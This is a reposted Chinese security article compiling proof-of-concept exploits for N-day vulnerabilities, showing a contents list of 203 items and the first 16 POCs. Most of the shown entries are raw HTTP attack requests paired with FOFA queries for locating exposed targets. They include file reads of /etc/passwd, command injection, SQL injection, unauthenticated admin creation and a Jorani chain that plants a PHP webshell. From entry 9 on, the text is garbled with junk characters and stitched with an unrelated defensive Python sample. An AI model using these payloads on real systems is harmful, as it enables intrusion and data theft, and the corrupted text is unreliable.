Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 (Daoyi Security) 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界, author 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks, so this article is intended to help defenders. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-severity vulnerabilities disclosed inside and outside China between September 2023 and May 2024, all gathered from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long have their body replaced by the word PAYLOAD; search for the full POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the material removed.

Statement

To keep things simple and easy to browse there is no "reply to receive the full list" gate: this article is the complete, current list. When using it, press F12 and search for a keyword.
Bookmark this article if you find it useful, and follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (华夏ERP, jshERP) sensitive information disclosure
15. Huaxia ERP (华夏ERP) getAllList information disclosure
16. Hongfan (红帆) HFOffice Yiweiyun (医微云) SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT integrated management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) Lianaiyun face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
70. Wanhu (万户) ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. Suda Tianyao (速达天耀) software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. Sifudi (思福迪) LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operation management center session command execution
93. Qi-Anxin Wangshen (奇安信网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi-Anxin Wangshen (奇安信网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo (北京百绰智能) S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo (北京百绰智能) S20 backend sysmanageajax.php SQL injection
120. Beijing Baichuo (北京百绰智能) S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo (北京百绰智能) S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
155. Liuling navigation page (六零导航页) file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite (美特) CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Yingfeida (英飞达) PACS (medical imaging archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
164. Huixiaoyuan (慧校园, Anxiaoyi) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
167. Jingyi (精益) value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. Tongtianxing (通天星) CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen (建文) engineering management system arbitrary file read
180. Bangguanke (帮管客) CRM jiliyu SQL injection
181. Runshen (润申科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (广州图创) library cluster management system updOpuserPw SQL injection
184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
185. Realor Tianyi (瑞友天翼) application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
189. Lanwang (蓝网科技) clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESafeNet (亿赛通) electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia (富通天下) foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) Yunjian security management system setsystemtimeaction command execution
194. Feiqi (飞企互联) FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) Internet behavior management system send_order.cgi command execution
196. Henan Fengsu (河南省风速科技) unified authentication platform password reset
197. Zheda Ente (浙大恩特) customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. Honghai Cloud (红海云) EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Replace the password value with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default account admin, then send the following request (the wifiRebootrange field carries the injected command):
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
$ Y( A6 } G; uGET /search/index.php?keyword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
9 f3 `. U/ O5 k; G. L+ A/ JHost: x.x.x.x4 T# P* A/ a8 t) `1 ~6 Y
; ]( O' r) O3 u$ O6 R& T5 d0 ~1 B$ X
payload为下列语句的二次Url编码
$ d7 }) }6 @$ \* u: J8 @# G" {3 M
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
. I, i- H5 H: s& T( f# l1 a9 R6 I: M5 R" ^% R1 C! a
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传( C6 m K! p; o8 T, B6 s7 ?
FOFA:icon_hash="953405444", N0 a/ ]. r% S; s- Z$ t. [2 ^
* e4 d3 s" d( X1 k; Y文件上传后响应中包含上传文件的路径
7 N; s8 v, \1 ]6 Y( M% ^1 W0 ^; F# PPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
; _5 s6 B$ B% o# [/ c$ M0 I; gHost: x.x.x.x:xx
& V( Y8 D. F7 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36/ m- ~4 X3 i6 _( p$ `+ U
Content-Length: 197
2 ^5 J2 m" l% @2 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- N; O: C( b, u3 D' H( M6 Q& QAccept-Encoding: gzip, deflate
( Q) [/ B+ v }1 l' P# E( uAccept-Language: zh-CN,zh;q=0.9
& Y9 G' w$ \, A, n# d" _# J% xConnection: close
$ h/ b$ f: p" @/ ~+ N, r( e0 Z" xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
1 K. G! C0 v2 y0 [0 t/ _% Z9 P9 i. {* N9 e( g, b& h1 n' r9 @
------WebKitFormBoundaryxdgaqmqu
- P* t& y1 J( ?) g' {* xContent-Disposition: form-data; name="file"filename="icfitnya.txt"; _3 ^+ D1 o% H1 `! M, j0 w$ _
Content-Type: text/html" Y6 o8 ? |) r8 E5 L: t# x& p
/ @4 r2 R. K% C/ ~% F
jmnqjfdsupxgfidopeixbgsxbf
& L9 x2 `& y6 b9 F+ u0 T# a) z------WebKitFormBoundaryxdgaqmqu--. l* w9 R( n; g" C5 X6 C$ ]
# Z7 H! B0 E, Q8 |3 E7 T9 K
) y: R7 b, K; z# A2 w& t- i7 a. Z
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入$ _, ^- E+ X$ P
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"( a: f1 l+ H! w
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# Q0 V9 `# C, D3 [
Host: 127.0.0.19 z" W/ B) D/ A9 J+ _: v# L8 P
Pragma: no-cache
2 R* U* h8 p ]7 O o; \ TCache-Control: no-cache
4 t7 ]% G/ V5 K4 \Upgrade-Insecure-Requests: 11 G$ ~ N; N5 D, e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ j9 b% U% k- s, v2 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 d& X0 R. W4 c8 ^* A" [! \: XAccept-Encoding: gzip, deflate
9 J/ ]" M% p* m, o g+ q' i( KAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 m( m. Q5 g8 Q7 ^Connection: close6 B1 O4 j. b! b
! f5 o5 H* `: @# N
7 c) N! e) j: Q" x3 e' s3 J
12. Jorani < 1.0.2 远程命令执行
0 P. X: j& `" h' s5 p& UFOFA:title="Jorani"
2 M x. H: Q$ f第一步先拿到cookie, d8 e' l8 n- w; A
GET /session/login HTTP/1.1, m) k( s1 W& |
Host: 192.168.190.30
- ?1 B4 Y( K, G9 n9 q3 \- xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36& c. ]1 n! @0 T/ h( m' f
Connection: close0 m# H( K# H1 b
Accept-Encoding: gzip: r, L. \" y# l' |" z
* G( Z6 C4 r* p( E n% g' H
& D3 c' H5 `4 f, e. [响应中csrf_cookie_jorani用于后续请求
' { r/ ^6 ^7 V2 ~. \( ?: J$ P5 D& `HTTP/1.1 200 OK
+ u3 J) A) [; v+ IConnection: close
1 t& O9 }& u0 l$ h LCache-Control: no-store, no-cache, must-revalidate
& R! H/ ?8 r) {- }& `& w' U+ P) dContent-Type: text/html; charset=UTF-8
' d* O. _4 K+ I% pDate: Tue, 24 Oct 2023 09:34:28 GMT. I. c, ?4 {3 a
Expires: Thu, 19 Nov 1981 08:52:00 GMT
$ R( A$ m$ D: `3 g( CLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
1 ~( U- i0 j6 @Pragma: no-cache7 ~ L6 M0 r" W9 M! P. P6 ^, B
Server: Apache/2.4.54 (Debian)
2 i0 _) r& Y' t8 Y, f6 FSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
% \2 [, I2 l0 r8 s0 b9 {Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
0 Z0 ^1 H( F' A1 n* c* I; JVary: Accept-Encoding
1 r/ n' T) a* L5 z
: g2 U4 ^ ~' N) |
: U1 e- g3 t ]- \$ xPOST请求,执行函数并进行base64编码+ \& E) g: a/ U
POST /session/login HTTP/1.1% J. E/ z; k: l& G; t
Host: 192.168.190.30, r$ Q, l+ O1 r0 }5 N( L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
) t4 P- b1 @5 [" x9 S% e) iConnection: close9 P9 u6 Q8 f4 ?4 A- o8 ]
Content-Length: 252
; j; V- E2 V- m' |* A( ?" g' rContent-Type: application/x-www-form-urlencoded
9 u/ s2 n& @0 {0 ~$ p3 qCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
8 \% ~3 |1 a, F& h5 D9 BAccept-Encoding: gzip
5 g2 ~8 Q- N( s9 J' [
" b0 n: W2 h+ |. p4 B! m# Ucsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
4 ?% f( C1 l, D4 H F% o* U6 Q( {. |- Y$ m& a/ E
. F; d+ H- {& V$ |: P$ R6 F. B
3 I% {: }0 f! |4 ], R& D, v) O向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
3 W+ i8 P2 B( k9 @+ V! `: mGET /pages/view/log-2023-10-24 HTTP/1.1
' g8 T0 n1 U. z7 ~" |Host: 192.168.190.30
9 F" |0 D6 F) g7 _. n& v6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! P( I3 x5 l) v4 |# m9 r' U/ k6 [Connection: close) C( ~8 j( j/ |
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r/ g- L# E( Z" S0 L# y9 @
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=8 B& C: F, o) }8 v4 h3 @
X-REQUESTED-WITH: XMLHttpRequest
/ M* ?1 t1 w# k$ E; m( i" x. _Accept-Encoding: gzip
2 N8 ]3 n2 Z9 H4 R$ b
+ X; w, |! }- [/ ^/ G& L& i) s" M# q c) e4 p6 X
13. 红帆iOffice ioFileDown任意文件读取
: R0 S i. k$ r3 J* B; l; o6 lFOFA:app="红帆-ioffice"
2 c9 L: {2 R: kGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1/ [! W1 t! M& B8 L% _* z7 s
Host: x.x.x.x$ N+ _& _% f' ?" r! k/ Y* R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( K: t7 K& Y L# W: B) p( z
Connection: close1 c1 \2 X" @9 E0 \% _
Accept: */*. o% p2 Q1 ^: t; Q+ c! h
Accept-Encoding: gzip, @& p) d3 H+ s9 |. |% @* I5 l
2 k3 a( Z+ y8 D6 ^
9 }6 V5 w( d( ~7 q- I8 Q14. 华夏ERP(jshERP)敏感信息泄露% b+ v4 K/ x, m* H6 m, U" s" T
FOFA:body="jshERP-boot"2 q! x5 b7 y$ Y8 c. R0 R- [
泄露内容包括用户名密码
5 m# R3 _- q. L, m' T! _8 r' h7 JGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) W6 I( P7 J. u9 z; _Host: x.x.x.x) L) Z2 R. z7 e- o+ {# Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36* N& [ i s/ a5 f* G6 n
Connection: close( R4 q, `. R5 e4 W
Accept: */*
; m- M' \9 }! _* J. ^/ Z! IAccept-Language: en5 X% o. F- j2 k/ y
Accept-Encoding: gzip
" U/ `7 V* K0 A( m" R3 u5 H
, |7 l) Q# w& v' C" [- k* i4 h* c. O0 u% R) J& y( Z
15. 华夏ERP getAllList信息泄露" g, z: E/ }4 [- [: z7 R
CVE-2024-0490$ z( S9 z% `: j& Z. c* a
FOFA:body="jshERP-boot"! O* ~1 V9 Z7 o8 y! e+ l
泄露内容包括用户名密码 I" B. O/ e" @3 P p* Z
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
" G# | Q w0 y- n( N, x' c8 i& oHost: 192.168.40.130:100$ X7 T* g, R( b0 T4 R7 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.364 B& w1 s7 i6 ]. J) }+ a- q* T
Connection: close# i$ {9 q+ q# v' h" w3 ]- d6 f
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
8 c3 M$ L& h; Z: a8 E2 L6 b+ YAccept-Language: en4 W% M! {% p0 G: g9 P" b
sec-ch-ua-platform: Windows5 _% b$ A8 d7 \/ a( a! M) M$ B
Accept-Encoding: gzip
8 W1 }) h' v: G3 d
8 }' Q9 N( x3 |0 o! T' w [
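Why the two requests in entries 14 and 15 reach getAllList without a session, as an added illustration in Python that is not jshERP's own code. It models a deliberately naive interceptor that exempts any request whose raw URI mentions a static-file extension (an assumed simplification of how this bug class arises, not the project's actual interceptor) next to a check that first canonicalises the path the way the servlet container and Spring route it, dropping ;matrix segments and resolving .., and only then decides. The prefix /jshERP-boot/user/ being the protected area is likewise an assumption for the example.

```python
"""Added example, not code from jshERP: why ';.ico' and 'a.ico/../' in
entries 14 and 15 slip past a naive static-resource exemption, and how
canonicalising the path before the authorisation decision closes both."""
import posixpath
import re
from urllib.parse import unquote

STATIC_SUFFIXES = (".ico", ".css", ".js", ".png", ".jpg")
# Assumed: the login interceptor is meant to protect everything under this prefix.
PROTECTED_PREFIX = "/jshERP-boot/user/"
# Assumed naive rule: exempt any request whose raw URI mentions a static suffix
# at a segment boundary. Illustration of the bug class, not the real interceptor.
_STATIC_ANYWHERE = re.compile(r"\.(?:ico|css|js|png|jpg)(?=$|[/;?])")


def naive_is_public(raw_uri: str) -> bool:
    """Flawed decision: looks at the raw URI text, not at what it routes to."""
    return _STATIC_ANYWHERE.search(raw_uri) is not None


def canonical_path(raw_uri: str) -> str:
    """Reduce a request URI to the path the container actually routes on:
    strip the query string, percent-decode, drop ';matrix' parameters from
    every segment, then resolve '.' and '..' segments."""
    path = unquote(raw_uri.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    cleaned = "/".join(segments).lstrip("/")  # avoid POSIX '//' special case
    return posixpath.normpath("/" + cleaned)


def hardened_is_public(raw_uri: str) -> bool:
    """Decide on the canonical path, and never exempt the protected prefix."""
    path = canonical_path(raw_uri)
    if path.startswith(PROTECTED_PREFIX):
        return False
    return path.endswith(STATIC_SUFFIXES)


def evaluate(raw_uri: str) -> dict:
    """Side-by-side verdict of the naive and the hardened check for one URI."""
    return {
        "uri": raw_uri,
        "routes_to": canonical_path(raw_uri),
        "naive_allows": naive_is_public(raw_uri),
        "hardened_allows": hardened_is_public(raw_uri),
    }


if __name__ == "__main__":
    for uri in ("/jshERP-boot/user/getAllList;.ico",
                "/jshERP-boot/user/a.ico/../getAllList",
                "/jshERP-boot/user/%61.ico/%2e%2e/getAllList",
                "/jshERP-boot/static/favicon.ico"):
        print(evaluate(uri))
```

The third URI in the usage block is a percent-encoded variant of entry 15 added here to show that the hardened check has to decode before it normalises; a real static favicon still passes both checks.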
0 t8 _1 h% R0 K& D0 T" D16. 红帆HFOffice医微云SQL注入8 S5 p0 M9 [3 U- K! u9 _
FOFA:title="HFOffice"* n& s# J/ ^' L# }/ O) s5 I
poc中调用函数计算1234的md5值' h* z8 E Q) _) @7 _4 T' r% z
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1, u8 z5 e1 {+ `2 |! _4 ?6 o
Host: x.x.x.x
